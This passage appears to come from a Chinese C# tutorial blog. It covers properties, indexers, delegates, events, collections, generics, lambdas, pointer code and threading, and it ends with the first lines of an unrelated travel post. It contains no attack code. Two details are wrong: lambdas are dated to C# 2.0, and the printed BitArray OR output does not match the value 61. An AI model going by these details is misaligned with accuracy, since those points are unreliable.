    ​虽然直接使用公共字段也可以达到相同的效果,但这种做法在实际开发中可能会带来更多的问题,例如难以控制访问权限、不利于后续的代码修改和维护等。因此,使用属性来访问私有字段是一种更好的实践,它能够提高代码的可靠性和灵活性。
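
    ​针对上面第 1 点,这里给一个在 setter 中做验证的小示意(补充示例,非教程原文):

    using System;

    class Member
    {
        private int age;

        public int Age
        {
            get { return age; }
            set
            {
                // 在 setter 中验证输入,阻止非法值写入私有字段
                if (value < 0 || value > 150)
                    throw new ArgumentOutOfRangeException(nameof(value), "年龄必须在 0~150 之间");
                age = value;
            }
        }
    }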

    抽象属性(Abstract Properties)

    ​抽象类可拥有抽象属性,这些属性应在派生类中被实现。下面的程序说明了这点:

    using System;
    namespace runoob
    {
    public abstract class Person
    {
    public abstract string Name
    {
    get;
    set;
    }
    public abstract int Age
    {
    get;
    set;
    }
    }
    class Student : Person
    {

    private string code = "N.A";
    private string name = "N.A";
    private int age = 0;

    // 声明类型为 string 的 Code 属性
    public string Code
    {
    get
    {
    return code;
    }
    set
    {
    code = value;
    }
    }

    // 声明类型为 string 的 Name 属性
    public override string Name
    {
    get
    {
    return name;
    }
    set
    {
    name = value;
    }
    }

    // 声明类型为 int 的 Age 属性
    public override int Age
    {
    get
    {
    return age;
    }
    set
    {
    age = value;
    }
    }
    public override string ToString()
    {
    return "Code = " + Code + ", Name = " + Name + ", Age = " + Age;
    }
    }
    class ExampleDemo
    {
    public static void Main()
    {
    // 创建一个新的 Student 对象
    Student s = new Student();

    // 设置 student 的 code、name 和 age
    s.Code = "001";
    s.Name = "Zara";
    s.Age = 9;
    Console.WriteLine("Student Info:- {0}", s);
    // 增加年龄
    s.Age += 1;
    Console.WriteLine("Student Info:- {0}", s);
    Console.ReadKey();
    }
    }
    }
    Student Info:- Code = 001, Name = Zara, Age = 9
    Student Info:- Code = 001, Name = Zara, Age = 10

    C# 索引器(Indexer)

    索引器(Indexer) 允许一个对象可以像数组一样使用下标的方式来访问。

    ​当您为类定义一个索引器时,该类的行为就会像一个 虚拟数组(virtual array) 一样。您可以使用数组访问运算符 [ ] 来访问该类的的成员。

    索引器(Indexer)的用途

    ​索引器的行为的声明在某种程度上类似于属性(property)。就像属性(property)一样,您可使用 get 和 set 访问器来定义索引器。但是,属性返回或设置一个特定的数据成员,而索引器返回或设置对象实例的一个特定值。换句话说,它把实例数据分为更小的部分,并索引每个部分,获取或设置每个部分。

    ​定义一个属性(property)包括提供属性名称。索引器定义的时候不带有名称,但带有 this 关键字,它指向对象实例。下面的实例演示了这个概念:

    using System;
    namespace IndexerApplication
    {
    class IndexedNames
    {
    private string[] namelist = new string[size];
    static public int size = 10;
    public IndexedNames()
    {
    for (int i = 0; i < size; i++)
    namelist[i] = "N. A.";
    }
    public string this[int index]
    {
    get
    {
    string tmp;

    if (index >= 0 && index <= size - 1)
    {
    tmp = namelist[index];
    }
    else
    {
    tmp = "";
    }

    return (tmp);
    }
    set
    {
    if (index >= 0 && index <= size - 1)
    {
    namelist[index] = value;
    }
    }
    }

    static void Main(string[] args)
    {
    IndexedNames names = new IndexedNames();
    names[0] = "Zara";
    names[1] = "Riz";
    names[2] = "Nuha";
    names[3] = "Asif";
    names[4] = "Davinder";
    names[5] = "Sunil";
    names[6] = "Rubic";
    for (int i = 0; i < IndexedNames.size; i++)
    {
    Console.WriteLine(names[i]);
    }
    Console.ReadKey();
    }
    }
    }
    Zara
    Riz
    Nuha
    Asif
    Davinder
    Sunil
    Rubic
    N. A.
    N. A.
    N. A.

    重载索引器(Indexer)

    ​索引器(Indexer)可被重载。索引器声明的时候也可带有多个参数,且每个参数可以是不同的类型。没有必要让索引器必须是整型的。C# 允许索引器可以是其他类型,例如,字符串类型。

    ​下面的实例演示了重载索引器:

    using System;
    namespace IndexerApplication
    {
    class IndexedNames
    {
    private string[] namelist = new string[size];
    static public int size = 10;
    public IndexedNames()
    {
    for (int i = 0; i < size; i++)
    {
    namelist[i] = "N. A.";
    }
    }
    public string this[int index]
    {
    get
    {
    string tmp;

    if (index >= 0 && index <= size - 1)
    {
    tmp = namelist[index];
    }
    else
    {
    tmp = "";
    }

    return (tmp);
    }
    set
    {
    if (index >= 0 && index <= size - 1)
    {
    namelist[index] = value;
    }
    }
    }
    public int this[string name]
    {
    get
    {
    int index = 0;
    while (index < size)
    {
    if (namelist[index] == name)
    {
    return index;
    }
    index++;
    }
    return index;
    }

    }

    static void Main(string[] args)
    {
    IndexedNames names = new IndexedNames();
    names[0] = "Zara";
    names[1] = "Riz";
    names[2] = "Nuha";
    names[3] = "Asif";
    names[4] = "Davinder";
    names[5] = "Sunil";
    names[6] = "Rubic";
    // 使用带有 int 参数的第一个索引器
    for (int i = 0; i < IndexedNames.size; i++)
    {
    Console.WriteLine(names[i]);
    }
    // 使用带有 string 参数的第二个索引器
    Console.WriteLine(names["Nuha"]);
    Console.ReadKey();
    }
    }
    }
    Zara
    Riz
    Nuha
    Asif
    Davinder
    Sunil
    Rubic
    N. A.
    N. A.
    N. A.
    2

    C# 委托(Delegate)

    ​C# 中的委托(Delegate)类似于 C 或 C++ 中函数的指针委托(Delegate) 是存有对某个方法的引用的一种引用类型变量。引用可在运行时被改变。

    ​委托(Delegate)特别用于实现事件和回调方法。所有的委托(Delegate)都派生自 System.Delegate 类。

    实例化委托(Delegate)

    using System;

    delegate int NumberChanger(int n);
    namespace DelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;
    public static int AddNum(int p)
    {
    num += p;
    return num;
    }

    public static int MultNum(int q)
    {
    num *= q;
    return num;
    }
    public static int getNum()
    {
    return num;
    }

    static void Main(string[] args)
    {
    // 创建委托实例
    NumberChanger nc1 = new NumberChanger(AddNum);
    NumberChanger nc2 = new NumberChanger(MultNum);
    // 使用委托对象调用方法
    nc1(25); // num = 10 + 25 = 35
    Console.WriteLine("Value of Num: {0}", getNum());
    nc2(5); // num = 35 * 5 = 175
    Console.WriteLine("Value of Num: {0}", getNum());
    Console.ReadKey();
    }
    }
    }
    Value of Num: 35
    Value of Num: 175

    委托的多播(Multicasting of a Delegate)

    ​委托对象可使用 “+” 运算符进行合并。一个合并委托调用它所合并的两个委托。只有相同类型的委托可被合并。“-” 运算符可用于从合并的委托中移除组件委托。

    ​使用委托的这个有用的特点,您可以创建一个委托被调用时要调用的方法的调用列表。这被称为委托的 多播(multicasting),也叫组播。下面的程序演示了委托的多播:

    using System;

    delegate int NumberChanger(int n);
    namespace DelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;
    public static int AddNum(int p)
    {
    num += p;
    return num;
    }

    public static int MultNum(int q)
    {
    num *= q;
    return num;
    }
    public static int getNum()
    {
    return num;
    }

    static void Main(string[] args)
    {
    // 创建委托实例
    NumberChanger nc;
    NumberChanger nc1 = new NumberChanger(AddNum);
    NumberChanger nc2 = new NumberChanger(MultNum);
    nc = nc1;
    nc += nc2;
    // 调用多播
    nc(5); // (10 + 5) * 5 = 75
    Console.WriteLine("Value of Num: {0}", getNum());
    Console.ReadKey();
    }
    }
    }
    Value of Num: 75

    委托(Delegate)的用途

    ​下面的实例演示了委托的用法。委托 printString 可用于引用一个以字符串作为输入、且没有返回值的方法。

    ​我们使用这个委托来调用两个方法(将函数变成一个参数),第一个把字符串打印到控制台,第二个把字符串打印到文件:

    using System;
    using System.IO;

    namespace DelegateAppl
    {
    class PrintString
    {
    static FileStream fs;
    static StreamWriter sw;
    // 委托声明
    public delegate void printString(string s);

    // 该方法打印到控制台
    public static void WriteToScreen(string str)
    {
    Console.WriteLine("The String is: {0}", str);
    }
    // 该方法打印到文件
    public static void WriteToFile(string s)
    {
    fs = new FileStream("c:\\message.txt", FileMode.Append, FileAccess.Write);
    sw = new StreamWriter(fs);
    sw.WriteLine(s);
    sw.Flush();
    sw.Close();
    fs.Close();
    }
    // 该方法把委托作为参数,并使用它调用方法
    public static void sendString(printString ps)
    {
    ps("Hello World");
    }
    static void Main(string[] args)
    {
    printString ps1 = new printString(WriteToScreen);
    printString ps2 = new printString(WriteToFile);
    sendString(ps1);
    sendString(ps2);
    Console.ReadKey();
    }
    }
    }

    C# 事件(Event)

    事件(Event) 基本上说是一个用户操作,如按键、点击、鼠标移动等等,或者是一些提示信息,如系统生成的通知。应用程序需要在事件发生时响应事件。例如,中断。

    C# 中使用事件机制实现线程间的通信。

    通过事件使用委托

    ​事件在类中声明且生成,且通过使用同一个类或其他类中的委托与事件处理程序关联。包含事件的类用于发布事件。这被称为 发布器(publisher) 类。其他接受该事件的类被称为 订阅器(subscriber) 类。事件使用 发布-订阅(publisher-subscriber) 模型。

    发布器(publisher) 是一个包含事件和委托定义的对象。事件和委托之间的联系也定义在这个对象中。发布器(publisher)类的对象调用这个事件,并通知其他的对象。

    订阅器(subscriber) 是一个接受事件并提供事件处理程序的对象。在发布器(publisher)类中的委托调用订阅器(subscriber)类中的方法(事件处理程序)。

    声明事件(Event)

    ​在类的内部声明事件,首先必须声明该事件的委托类型。例如:

    public delegate void BoilerLogHandler(string status);

    ​然后,声明事件本身,使用 event 关键字:

    // 基于上面的委托定义事件
    public event BoilerLogHandler BoilerEventLog;

    示例

    using System;
    namespace SimpleEvent
    {
    using System;
    /***********发布器类***********/
    public class EventTest
    {
    private int value;

    public delegate void NumManipulationHandler();

    public event NumManipulationHandler ChangeNum;

    protected virtual void OnNumChanged() // 为了允许子类(如果有的话)重写这个方法
    {
    if (ChangeNum != null)
    {
    ChangeNum(); /* 事件被触发,派发事件 ChangeNum */
    }
    else
    {
    Console.WriteLine("event not fire");
    Console.ReadKey(); /* 回车继续 */
    }
    }


    public EventTest() // 构造函数
    {
    int n = 5;
    SetValue(n);
    }


    public void SetValue(int n)
    {
    if (value != n) // 如果数据更新:
    {
    value = n;
    OnNumChanged();
    }
    }
    }


    /***********订阅器类***********/

    public class subscribEvent
    {
    public void printf()
    {
    Console.WriteLine("event fire");
    Console.ReadKey(); /* 回车继续 */
    }
    }

    /***********触发***********/
    public class MainClass
    {
    public static void Main()
    {
    EventTest e = new EventTest(); /* 实例化对象,构造函数将执行一次 OnNumChanged(),第一次没有触发事件 */
    subscribEvent v = new subscribEvent(); /* 实例化对象 */
    e.ChangeNum += new EventTest.NumManipulationHandler(v.printf); /* 注册:接收到消息时,执行函数:printf() */
    e.SetValue(7);
    e.SetValue(11);
    e.SetValue(11);
    e.SetValue(9);
    }
    }
    }
    event not fire
    event fire
    event fire
    event fire

    C# 集合(Collection)

    ​集合(Collection)类是专门用于数据存储和检索的类。这些类提供了对:

    • 栈(stack)
    • 队列(queue)
    • 列表(list)
    • 哈希表(hash table)

    的支持。大多数集合类实现了相同的接口。

    List

    using System;
    using static System.Console;
    using System.Collections.Generic;
    namespace HelloWorldApplication
    {
    class HelloWorld
    {
    static void Main(string[] args)
    {
    var a = new List<int>();
    a.Add(2);
    a.Add(6);
    a.Add(2);
    a.Add(10);
    Console.WriteLine($"第一个数为{a[0]}");
    a.Remove(2);//删去第一个匹配此条件的项
    a.Sort();
    foreach (var a2 in a)
    {
    WriteLine(a2);
    }
    bool a3 = a.Contains(2);
    WriteLine(a3);
    Console.ReadKey();
    }
    }
    }
    第一个数为2
    2
    6
    10
    True

    动态数组(ArrayList)

    ​在 C# 中,List<T> 和 ArrayList 都是用来存储集合数据的类,但它们在实现和使用上有一些重要的区别:

    1. 类型安全性
      • List<T>:List<T> 是泛型类,其中的 <T> 表示可以存储的元素类型。这意味着在创建 List<T> 实例时,你必须指定存储在列表中的元素类型。例如,List<int> 表示只能存储整数类型的列表,List<string> 表示只能存储字符串类型的列表。由于是泛型类,编译器可以在编译时执行类型检查,确保在编写代码时就能捕获到类型不匹配的错误。
      • ArrayList:ArrayList 是非泛型类,可以存储任意类型的对象。在 ArrayList 中,存储的是 object 类型的元素,因此可以存储任何类型的对象。但这也带来了一个问题,即当你从 ArrayList 中取出元素时,需要进行显式的类型转换,这可能导致运行时类型转换错误。
    2. 性能
      • List 通常比 ArrayList 性能更好,因为它避免了装箱和拆箱的开销。装箱是将值类型转换为对象类型,而拆箱是将对象类型转换为值类型。由于 List<T> 是泛型的,可以直接存储值类型,因此避免了这些额外的操作。
      • ArrayList 存储的是 object 类型,因此当你从 ArrayList 中取出元素时,需要进行类型转换(拆箱),这会引入性能损失。
    3. 扩展性
      • List 支持 LINQ 查询,因为它是泛型的,可以与 LINQ 方法无缝集成,提供了丰富的集合操作功能。
      • ArrayList 由于存储的是 object 类型,无法直接与 LINQ 方法一起使用,需要在使用时进行显式的类型转换。

    ​基于以上区别,推荐在大多数情况下优先选择 List<T>,因为它提供了类型安全、性能更好以及更好的扩展性。只有在需要与遗留代码或者需要存储不同类型对象的情况下,才考虑使用 ArrayList
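
    ​先用几行代码直观对比两者的取值方式(补充示意,非教程原文),随后是教程中完整的 ArrayList 示例:

    using System;
    using System.Collections;
    using System.Collections.Generic;

    class CastDemo
    {
        static void Main()
        {
            ArrayList al = new ArrayList();
            al.Add(45);             // int 被装箱为 object
            int x = (int)al[0];     // 取出时必须显式拆箱,类型写错会在运行时抛 InvalidCastException

            List<int> list = new List<int> { 45 };
            int y = list[0];        // 泛型:无装箱拆箱,类型在编译期检查

            Console.WriteLine(x + ", " + y); // 45, 45
        }
    }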

    using System;
    using System.Collections;

    namespace CollectionApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    ArrayList al = new ArrayList();

    Console.WriteLine("Adding some objects:");
    al.Add(45);
    al.Add("A");
    al.Add(33);
    al.Add(56);
    al.Add(true);
    al.Add(23);
    al.Add(9);

    Console.WriteLine("Capacity: {0} ", al.Capacity);
    Console.WriteLine("Count: {0}", al.Count);

    Console.Write("Content: ");
    foreach (var i in al)
    {
    Console.Write(i + " ");
    }
    Console.WriteLine();
    Console.ReadKey();
    }
    }
    }
    Adding some objects:
    Capacity: 8
    Count: 7
    Content: 45 A 33 56 True 23 9

    哈希表(Hashtable)

    ​Hashtable 类代表了一系列基于键的哈希代码组织起来的键/值对。它使用键来访问集合中的元素。

    ​当您需要使用键来访问元素时,则可以使用哈希表,此时您需要为每个元素指定一个有用的键。哈希表中的每一项都有一个键/值对。键用于访问集合中的项目。

    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    Hashtable ht = new Hashtable();


    ht.Add("001", "Zara Ali");
    ht.Add("002", "Abida Rehman");
    ht.Add("003", "Joe Holzner");
    ht.Add("004", "Mausam Benazir Nur");
    ht.Add("005", "M. Amlan");
    ht.Add("006", "M. Arif");
    ht.Add("007", "Ritesh Saikia");

    if (ht.ContainsValue("Nuha Ali"))
    {
    Console.WriteLine("This student name is already in the list");
    }
    else
    {
    ht.Add("008", "Nuha Ali");
    }
    // 获取键的集合
    ICollection key = ht.Keys;

    foreach (string k in key)
    {
    Console.WriteLine(k + ": " + ht[k]);
    }
    Console.ReadKey();
    }
    }
    }
    006: M. Arif
    007: Ritesh Saikia
    008: Nuha Ali
    003: Joe Holzner
    002: Abida Rehman
    004: Mausam Benazir Nur
    001: Zara Ali
    005: M. Amlan

    字典

    ​在 C# 中,哈希表(HashTable)和字典(Dictionary)是两种不同的数据结构,它们具有以下区别:

    1. 实现方式
      • 哈希表(HashTable):System.Collections.Hashtable 是在早期版本的 .NET 中提供的,它实现了一个散列表,使用哈希函数来存储和访问键值对。它支持通过哈希码进行快速的插入、删除和查找操作。哈希表中的键和值可以是任意对象,但通常情况下要求键和值都不为 null。
      • 字典(Dictionary):System.Collections.Generic.Dictionary<TKey, TValue> 是泛型类型,在 .NET Framework 2.0 及以后的版本中引入。字典也是基于哈希表的实现,但它是类型安全的,允许指定键(Key)和值(Value)的类型。这使得字典在类型检查和类型安全性方面比哈希表更优越。
    2. 类型安全性
      • 哈希表:由于哈希表存储的是 object 类型,所以在检索值时需要进行显式的类型转换,这可能导致运行时类型错误或异常。
      • 字典:字典使用泛型参数 <TKey, TValue> 定义键和值的类型,因此编译器能够在编译时捕获类型错误,提供更安全的操作。
    3. 性能
      • 在大多数情况下,字典的性能会优于哈希表,因为字典的实现允许更高效的内部优化,而且由于泛型类型的引入,它可以更准确地利用内存和处理器的优化特性。

    ​综上所述,尽管哈希表和字典在功能上有所重叠(即存储键值对的能力),但字典在C#中通常是更好的选择,特别是在需要类型安全、更好性能和更清晰的编码方面。
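
    ​另外一点:用索引器读取字典中不存在的键会抛出 KeyNotFoundException,更安全的写法是 TryGetValue(补充示意,非教程原文),随后是教程的 Dictionary 示例:

    using System;
    using System.Collections.Generic;

    class TryGetValueDemo
    {
        static void Main()
        {
            var dict = new Dictionary<string, int> { { "a", 1 } };

            // 避免 KeyNotFoundException 的惯用写法
            if (dict.TryGetValue("b", out int value))
                Console.WriteLine(value);
            else
                Console.WriteLine("键 b 不存在"); // 本例走这个分支
        }
    }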

    using System;
    using System.Collections.Generic;
    namespace HelloWorldApplication
    {
    class A
    {
    static void Main(string[] args)
    {
    var a = new Dictionary<int, int>();
    a.Add(12, 14);
    a.Add(0, 1);
    Console.WriteLine("删去前的Count" + a.Count);
    a.Remove(0);
    Console.WriteLine(a[12]);
    Console.WriteLine(a.Count);
    Console.WriteLine(a.ContainsKey(12));
    Console.ReadKey();
    }
    }
    }
    删去前的Count2
    14
    1
    True

    排序列表(SortedList)

    ​SortedList 类代表了一系列按照键来排序的键/值对,这些键值对可以通过键和索引来访问。

    ​排序列表是数组和哈希表的组合。它包含一个可使用键或索引访问各项的列表。如果您使用索引访问各项,则它是一个动态数组(ArrayList),如果您使用键访问各项,则它是一个哈希表(Hashtable)。集合中的各项总是按键值排序。

    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    SortedList sl = new SortedList();

    sl.Add("003", "Joe Holzner");
    sl.Add("001", "Zara Ali");
    sl.Add("004", "Mausam Benazir Nur");
    sl.Add("002", "Abida Rehman");
    sl.Add("107", "Ritesh Saikia");
    sl.Add("006", "M. Arif");
    sl.Add("00A", "M. Amlan");

    if (sl.ContainsValue("Nuha Ali"))
    {
    Console.WriteLine("This student name is already in the list");
    }
    else
    {
    sl.Add("008", "Nuha Ali");
    }

    // 获取键的集合
    ICollection key = sl.Keys;

    foreach (string k in key)
    {
    Console.WriteLine(k + ": " + sl[k]);
    }
    }
    }
    }
    001: Zara Ali
    002: Abida Rehman
    003: Joe Holzner
    004: Mausam Benazir Nur
    006: M. Arif
    008: Nuha Ali
    00A: M. Amlan
    107: Ritesh Saikia

    堆栈(Stack)

    堆栈(Stack)代表了一个后进先出的对象集合。当您需要对各项进行后进先出的访问时,则使用堆栈。当您在列表中添加一项,称为推入元素,当您从列表中移除一项时,称为弹出元素。

    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    Stack st = new Stack();

    st.Push('A');
    st.Push('M');
    st.Push('G');
    st.Push('W');

    Console.WriteLine("Current stack: ");
    foreach (char c in st)
    {
    Console.Write(c + " ");
    }
    Console.WriteLine();

    st.Push('V');
    st.Push('H');
    Console.WriteLine("The next poppable value in stack: {0}",
    st.Peek());
    Console.WriteLine("Current stack: ");
    foreach (char c in st)
    {
    Console.Write(c + " ");
    }
    Console.WriteLine();

    Console.WriteLine("Removing values ");
    st.Pop();
    st.Pop();
    st.Pop();

    Console.WriteLine("Current stack: ");
    foreach (char c in st)
    {
    Console.Write(c + " ");
    }
    }
    }
    }
    Current stack:
    W G M A
    The next poppable value in stack: H
    Current stack:
    H V W G M A
    Removing values
    Current stack:
    G M A

    队列(Queue)

    ​队列(Queue)代表了一个先进先出的对象集合。当您需要对各项进行先进先出的访问时,则使用队列。当您在列表中添加一项,称为入队,当您从列表中移除一项时,称为出队。

    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    Queue q = new Queue();

    q.Enqueue('A');
    q.Enqueue('M');
    q.Enqueue('G');
    q.Enqueue('W');

    Console.WriteLine("Current queue: ");
    foreach (char c in q)
    Console.Write(c + " ");
    Console.WriteLine();
    q.Enqueue('V');
    q.Enqueue('H');
    Console.WriteLine("Current queue: ");
    foreach (char c in q)
    Console.Write(c + " ");
    Console.WriteLine();
    Console.WriteLine("Removing some values ");
    char ch = (char)q.Dequeue();
    Console.WriteLine("The removed value: {0}", ch);
    ch = (char)q.Dequeue();
    Console.WriteLine("The removed value: {0}", ch);
    Console.ReadKey();
    }
    }
    }
    Current queue:
    A M G W
    Current queue:
    A M G W V H
    Removing some values
    The removed value: A
    The removed value: M

    点阵列(BitArray)

    ​BitArray 类管理一个紧凑型的位值数组,它使用布尔值来表示,其中 true 表示位是开启的(1),false 表示位是关闭的(0)。

    ​当您需要存储位,但是事先不知道位数时,则使用点阵列。您可以使用整型索引从点阵列集合中访问各项,索引从零开始。

    using System;
    using System.Collections;

    namespace CollectionsApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    // 创建两个大小为 8 的点阵列
    BitArray ba1 = new BitArray(8);
    BitArray ba2 = new BitArray(8);
    byte[] a = { 60 };
    byte[] b = { 13 };

    // 把值 60 和 13 存储到点阵列中
    ba1 = new BitArray(a);
    ba2 = new BitArray(b);

    // ba1 的内容
    Console.WriteLine("Bit array ba1: 60");
    for (int i = 0; i < ba1.Count; i++)
    {
    Console.Write("{0, -6} ", ba1[i]);
    }
    Console.WriteLine();

    // ba2 的内容
    Console.WriteLine("Bit array ba2: 13");
    for (int i = 0; i < ba2.Count; i++)
    {
    Console.Write("{0, -6} ", ba2[i]);
    }
    Console.WriteLine();


    BitArray ba3 = new BitArray(8);
    ba3 = ba1.And(ba2);

    // ba3 的内容
    Console.WriteLine("Bit array ba3 after AND operation: 12");
    for (int i = 0; i < ba3.Count; i++)
    {
    Console.Write("{0, -6} ", ba3[i]);
    }
    Console.WriteLine();

    ba3 = ba1.Or(ba2);
    // ba3 的内容
    Console.WriteLine("Bit array ba3 after OR operation: 61");
    for (int i = 0; i < ba3.Count; i++)
    {
    Console.Write("{0, -6} ", ba3[i]);
    }
    Console.WriteLine();

    Console.ReadKey();
    }
    }
    }
    Bit array ba1: 60
    False False True True True True False False
    Bit array ba2: 13
    True False True True False False False False
    Bit array ba3 after AND operation: 12
    False False True True False False False False
    Bit array ba3 after OR operation: 61
    True False True True False False False False

    ​感觉就是把一个数的二进制形式拆成 bool 形式来表示。

    泛型(Generic)

    泛型(Generic) 允许您延迟编写类或方法中的编程元素的数据类型的规范,直到实际在程序中使用它的时候。换句话说,泛型允许您编写一个可以与任何数据类型一起工作的类或方法。

    ​您可以通过数据类型的替代参数编写类或方法的规范。当编译器遇到类的构造函数或方法的函数调用时,它会生成代码来处理指定的数据类型。
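
    ​先看一个最简单的泛型方法(补充示意,非教程原文):

    using System;

    class GenericMethodDemo
    {
        // 泛型方法:同一份代码适用于任意类型 T
        static void Swap<T>(ref T a, ref T b)
        {
            T tmp = a;
            a = b;
            b = tmp;
        }

        static void Main()
        {
            int x = 1, y = 2;
            Swap(ref x, ref y);               // T 被推断为 int
            Console.WriteLine($"{x}, {y}");   // 2, 1

            string s1 = "hello", s2 = "world";
            Swap(ref s1, ref s2);             // T 被推断为 string
            Console.WriteLine($"{s1}, {s2}"); // world, hello
        }
    }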

    ​您可以通过类型参数定义泛型委托。例如:

    using System;
    using System.Collections.Generic;

    delegate T NumberChanger<T>(T n);
    namespace GenericDelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;
    public static int AddNum(int p)
    {
    num += p;
    return num;
    }

    public static int MultNum(int q)
    {
    num *= q;
    return num;
    }
    public static int getNum()
    {
    return num;
    }

    static void Main(string[] args)
    {
    // 创建委托实例
    NumberChanger<int> nc1 = new NumberChanger<int>(AddNum);
    NumberChanger<int> nc2 = new NumberChanger<int>(MultNum);
    // 使用委托对象调用方法
    nc1(25);
    Console.WriteLine("Value of Num: {0}", getNum());
    nc2(5);
    Console.WriteLine("Value of Num: {0}", getNum());
    Console.ReadKey();
    }
    }
    }
    Value of Num: 35
    Value of Num: 175

    C# 匿名方法

    ​在 C# 中,匿名函数是一种没有名字的方法,可以在代码中定义和使用。

    ​我们已经提到过,委托是用于引用与其具有相同标签的方法。换句话说,您可以使用委托对象调用可由委托引用的方法。

    匿名方法(Anonymous methods) 提供了一种传递代码块作为委托参数的技术。

    ​在匿名方法中您不需要指定返回类型,它是从方法主体内的 return 语句推断的。

    Lambda 表达式

    ​Lambda 表达式是一个简洁的语法,用于创建匿名函数。它们通常用于 LINQ 查询和委托。

    (parameters) => expression
    // 或
    (parameters) => { statement; }
    // 示例:使用 Lambda 表达式定义一个委托
    Func<int, int, int> add = (a, b) => a + b;
    Console.WriteLine(add(2, 3)); // 输出 5

    // 示例:使用 Lambda 表达式过滤数组中的元素(需要 using System.Linq;)
    int[] numbers = { 1, 2, 3, 4, 5 };
    var evenNumbers = numbers.Where(n => n % 2 == 0);
    foreach (var num in evenNumbers)
    {
    Console.WriteLine(num); // 输出 2 4
    }

    匿名方法

    ​匿名方法是通过使用 delegate 关键字创建委托实例来声明的。

    using System;

    delegate void NumberChanger(int n);
    namespace DelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;
    public static void AddNum(int p)
    {
    num += p;
    Console.WriteLine("Named Method: {0}", num);
    }

    public static void MultNum(int q)
    {
    num *= q;
    Console.WriteLine("Named Method: {0}", num);
    }

    static void Main(string[] args)
    {
    // 使用匿名方法创建委托实例
    NumberChanger nc = delegate(int x)
    {
    Console.WriteLine("Anonymous Method: {0}", x);
    };

    // 使用匿名方法调用委托
    nc(10);

    // 使用命名方法实例化委托
    nc = new NumberChanger(AddNum);

    // 使用命名方法调用委托
    nc(5);

    // 使用另一个命名方法实例化委托
    nc = new NumberChanger(MultNum);

    // 使用命名方法调用委托
    nc(2);
    Console.ReadKey();
    }
    }
    }

    ​在 C# 2.0 及更高版本中,引入了 lambda 表达式,它是一种更简洁的语法形式,用于编写匿名方法。

    ​使用 lambda 表达式:

    using System;

    delegate void NumberChanger(int n);

    namespace DelegateAppl
    {
    class TestDelegate
    {
    static int num = 10;

    public static void AddNum(int p)
    {
    num += p;
    Console.WriteLine("Named Method: {0}", num);
    }

    public static void MultNum(int q)
    {
    num *= q;
    Console.WriteLine("Named Method: {0}", num);
    }

    static void Main(string[] args)
    {
    // 使用 lambda 表达式创建委托实例
    NumberChanger nc = x => Console.WriteLine($"Lambda Expression: {x}");

    // 使用 lambda 表达式调用委托
    nc(10);

    // 使用命名方法实例化委托
    nc = new NumberChanger(AddNum);

    // 使用命名方法调用委托
    nc(5);

    // 使用另一个命名方法实例化委托
    nc = new NumberChanger(MultNum);

    // 使用命名方法调用委托
    nc(2);

    Console.ReadKey();
    }
    }
    }
    Lambda Expression: 10
    Named Method: 15
    Named Method: 30

    C# 不安全代码

    ​当一个代码块使用 unsafe 修饰符标记时,C# 允许在函数中使用指针变量。不安全代码或非托管代码是指使用了指针变量的代码块。编译这类代码需要启用编译器的 unsafe 选项(例如项目中的 AllowUnsafeBlocks)。

    ​就跟 C/C++ 差不多了……

    using System;
    namespace UnsafeCodeApplication
    {
    class Program
    {
    static unsafe void Main(string[] args)
    {
    int var = 20;
    int* p = &var;
    Console.WriteLine("Data is: {0} ", var);
    Console.WriteLine("Address is: {0}", (int)p);
    Console.ReadKey();
    }
    }
    }

    C# 多线程

    线程 被定义为程序的执行路径。每个线程都定义了一个独特的控制流。如果您的应用程序涉及到复杂的和耗时的操作,那么设置不同的线程执行路径往往是有益的,每个线程执行特定的工作。

    ​线程是轻量级进程。一个使用线程的常见实例是现代操作系统中并行编程的实现。使用线程节省了 CPU 周期的浪费,同时提高了应用程序的效率。

    ​到目前为止,我们编写的程序都是作为单一进程、以单线程运行的。但是,这样应用程序同时只能执行一个任务。为了同时执行多个任务,可以把它划分为更小的线程。

    using System;
    using System.Threading;

    namespace MultithreadingApplication
    {
    class ThreadCreationProgram
    {
    public static void CallToChildThread()
    {
    try
    {

    Console.WriteLine("Child thread starts");
    // 计数到 10
    for (int counter = 0; counter <= 10; counter++)
    {
    Thread.Sleep(500);
    Console.WriteLine(counter);
    }
    Console.WriteLine("Child Thread Completed");

    }
    catch (ThreadAbortException e)
    {
    Console.WriteLine("Thread Abort Exception");
    }
    finally
    {
    Console.WriteLine("Couldn't catch the Thread Exception");
    }

    }

    static void Main(string[] args)
    {
    ThreadStart childref = new ThreadStart(CallToChildThread);
    Console.WriteLine("In Main: Creating the Child thread");
    Thread childThread = new Thread(childref);
    childThread.Start();
    // 停止主线程一段时间
    Thread.Sleep(2000);
    // 现在中止子线程
    Console.WriteLine("In Main: Aborting the Child thread");
    childThread.Abort(); // 终止子线程
    Console.ReadKey();
    }
    }
    }
    In Main: Creating the Child thread
    Child thread starts
    0
    1
    2
    In Main: Aborting the Child thread
    Thread Abort Exception
    Couldn't catch the Thread Exception
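
    ​需要注意:Thread.Abort 在 .NET Core / .NET 5+ 上已不受支持(调用会抛 PlatformNotSupportedException),现代代码一般改用 CancellationToken 协作式地结束线程(补充示意,非教程原文):

    using System;
    using System.Threading;

    class CancellationDemo
    {
        static void Main()
        {
            var cts = new CancellationTokenSource();

            var child = new Thread(() =>
            {
                // 子线程定期检查取消标志,而不是被外部强行中止
                while (!cts.Token.IsCancellationRequested)
                {
                    Console.WriteLine("working...");
                    Thread.Sleep(500);
                }
                Console.WriteLine("Child thread exits gracefully");
            });

            child.Start();
            Thread.Sleep(2000);
            cts.Cancel(); // 请求取消
            child.Join(); // 等待子线程退出
        }
    }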
    粤了(一)

    前言

            

    ​这是一个姗姗来迟的系列……我想把这个系列做得好看一点,所以有时间慢慢整吧。

    ​7.11 放暑假回家了,按照之前的计划,先去广东玩三天再回去😍。

    正文

    1-去程

    06:44 再见冀大!

    七一路河大新区

    ​虽然说是 8:09 的高铁,但是我已经等不及了😍。

    06:47 巨力大桥

